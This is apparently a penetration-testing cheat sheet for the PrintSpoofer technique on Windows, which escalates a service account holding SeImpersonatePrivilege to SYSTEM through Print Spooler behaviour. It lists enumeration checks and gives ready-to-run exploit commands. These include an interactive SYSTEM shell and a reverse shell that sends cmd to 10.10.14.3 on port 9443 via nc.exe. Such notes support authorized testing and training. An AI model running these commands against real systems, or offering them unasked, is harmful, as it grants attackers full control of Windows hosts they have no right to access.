PrintSpoofer abuses SeImpersonatePrivilege with Print Spooler behavior to execute a command as SYSTEM on compatible systems.
This is commonly service account to SYSTEM. The Print Spooler must be available, and endpoint controls may block the chain.
When enumerating PrintSpoofer opportunities, try to identify:
SeImpersonatePrivilegein the current token- Current context is a service account
- Print Spooler running
- Compatible Windows build
- Writable staging directory
- Payload execution method
Enumeration
Confirm the privilege:
whoami /priv
Confirm the Print Spooler is running:
sc query Spooler
Interesting findings include:
SeImpersonatePrivilegepresent- Spooler is running
- Service account context
- Tool execution is not blocked
Once confirmed, run a proof command before launching a full payload.
Exploit
Run a proof command:
PrintSpoofer.exe -c "cmd /c whoami > C:\Users\Public\spoofer.txt"
Confirm the result:
type C:\Users\Public\spoofer.txt
Spawn an interactive SYSTEM shell when the session supports it:
PrintSpoofer.exe -i -c cmd
Reverse shell variant:
PrintSpoofer.exe -c "C:\Windows\Temp\nc.exe 10.10.14.3 9443 -e cmd"